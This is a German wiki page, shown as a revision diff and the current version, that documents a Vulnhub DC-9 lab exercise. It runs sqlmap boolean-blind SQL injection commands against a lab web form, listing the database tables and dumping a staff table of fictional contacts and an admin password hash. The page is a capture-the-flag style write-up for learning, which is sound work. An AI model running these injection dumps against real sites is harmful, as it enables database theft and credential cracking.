Vulnhub dc-9 auslesen der Tabellen: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 105: | Zeile 105: | ||
[*] ending @ 10:06:02 /2023-03-09/ | [*] ending @ 10:06:02 /2023-03-09/ | ||
</pre> | </pre> | ||
| − | =Inhalte von | + | =Inhalte von Tabellen auslesen= |
| + | ==Datenbank Staff Tabelle StaffDetails== | ||
*'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B -D Staff -T StaffDetails --dump''' | *'''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B -D Staff -T StaffDetails --dump''' | ||
<pre> | <pre> | ||
| Zeile 138: | Zeile 139: | ||
[*] ending @ 10:10:47 /2023-03-09/ | [*] ending @ 10:10:47 /2023-03-09/ | ||
</pre> | </pre> | ||
| − | *sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B -D Staff -T Users --dump | + | ==Datenbank Staff Tabelle Users== |
| + | *''sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B -D Staff -T Users --dump'' | ||
| + | <pre> | ||
| + | Database: Staff | ||
| + | Table: Users | ||
| + | [1 entry] | ||
| + | +--------+----------------------------------+----------+ | ||
| + | | UserID | Password | Username | | ||
| + | +--------+----------------------------------+----------+ | ||
| + | | 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin | | ||
| + | +--------+----------------------------------+----------+ | ||
| + | |||
| + | [10:21:20] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/10.0.10.58/dump/Staff/Users.csv' | ||
| + | [10:21:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58' | ||
| + | |||
| + | [*] ending @ 10:21:20 /2023-03-09/ | ||
| + | </pre> | ||
Version vom 9. März 2023, 09:23 Uhr
Alle Tabellen auslesen
- sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B --tables --threads=5
[10:06:01] [INFO] fetching number of tables for database 'users' [10:06:01] [INFO] retrieved: 1 [10:06:01] [INFO] retrieving the length of query output [10:06:01] [INFO] retrieved: 11 [10:06:02] [INFO] retrieved: UserDetails Database: information_schema [76 tables] +---------------------------------------+ | ALL_PLUGINS | | APPLICABLE_ROLES | | CHARACTER_SETS | | CHECK_CONSTRAINTS | | CLIENT_STATISTICS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENABLED_ROLES | | ENGINES | | EVENTS | | FILES | | GEOMETRY_COLUMNS | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | INDEX_STATISTICS | | INNODB_BUFFER_PAGE | | INNODB_BUFFER_PAGE_LRU | | INNODB_BUFFER_POOL_STATS | | INNODB_CMP | | INNODB_CMPMEM | | INNODB_CMPMEM_RESET | | INNODB_CMP_PER_INDEX | | INNODB_CMP_PER_INDEX_RESET | | INNODB_CMP_RESET | | INNODB_FT_BEING_DELETED | | INNODB_FT_CONFIG | | INNODB_FT_DEFAULT_STOPWORD | | INNODB_FT_DELETED | | INNODB_FT_INDEX_CACHE | | INNODB_FT_INDEX_TABLE | | INNODB_LOCKS | | INNODB_LOCK_WAITS | | INNODB_METRICS | | INNODB_MUTEXES | | INNODB_SYS_COLUMNS | | INNODB_SYS_DATAFILES | | INNODB_SYS_FIELDS | | INNODB_SYS_FOREIGN | | INNODB_SYS_FOREIGN_COLS | | INNODB_SYS_INDEXES | | INNODB_SYS_SEMAPHORE_WAITS | | INNODB_SYS_TABLES | | INNODB_SYS_TABLESPACES | | INNODB_SYS_TABLESTATS | | INNODB_SYS_VIRTUAL | | INNODB_TABLESPACES_ENCRYPTION | | INNODB_TABLESPACES_SCRUBBING | | INNODB_TRX | | KEY_CACHES | | KEY_COLUMN_USAGE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | SPATIAL_REF_SYS | | STATISTICS | | SYSTEM_VARIABLES | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TABLE_STATISTICS | | TRIGGERS | | USER_PRIVILEGES | | USER_STATISTICS | | VIEWS | | user_variables | +---------------------------------------+ Database: Staff [2 tables] +---------------------------------------+ | StaffDetails | | Users | +---------------------------------------+ Database: users [1 table] +---------------------------------------+ | UserDetails | +---------------------------------------+ [10:06:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58' [*] ending @ 10:06:02 /2023-03-09/
Inhalte von Tabellen auslesen
Datenbank Staff Tabelle StaffDetails
- sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B -D Staff -T StaffDetails --dump
Database: Staff Table: StaffDetails [17 entries] +----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+ | id | email | phone | lastname | reg_date | firstname | position | +----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+ | 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO | | 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources | | 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator | | 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk | | 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver | | 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores | | 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts | | 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts | | 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales | | 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor | | 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant | | 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor | | 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing | | 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor | | 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat | | 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor | | 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor | +----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+ [10:10:47] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/10.0.10.58/dump/Staff/StaffDetails.csv' [10:10:47] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58' [*] ending @ 10:10:47 /2023-03-09/
Datenbank Staff Tabelle Users
- sqlmap -u "http://10.0.10.58/results.php" --data="search=Mary" --technique=B -D Staff -T Users --dump
Database: Staff Table: Users [1 entry] +--------+----------------------------------+----------+ | UserID | Password | Username | +--------+----------------------------------+----------+ | 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin | +--------+----------------------------------+----------+ [10:21:20] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/10.0.10.58/dump/Staff/Users.csv' [10:21:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.0.10.58' [*] ending @ 10:21:20 /2023-03-09/